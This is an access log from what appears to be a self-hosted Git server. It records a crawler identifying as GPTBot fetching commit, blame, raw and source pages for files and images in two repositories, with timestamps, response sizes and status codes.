"/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" -[17/Feb/2026:13:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10108] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:13:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" -[17/Feb/2026:13:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10352] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" -[17/Feb/2026:13:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" -[17/Feb/2026:13:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" -[17/Feb/2026:13:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14658] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10170] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" -[17/Feb/2026:13:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:13:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699387] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429930] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699327] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692350] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641783] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10813] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10818] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16911] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:13:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508417] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498775] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692322] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429885] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429935] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 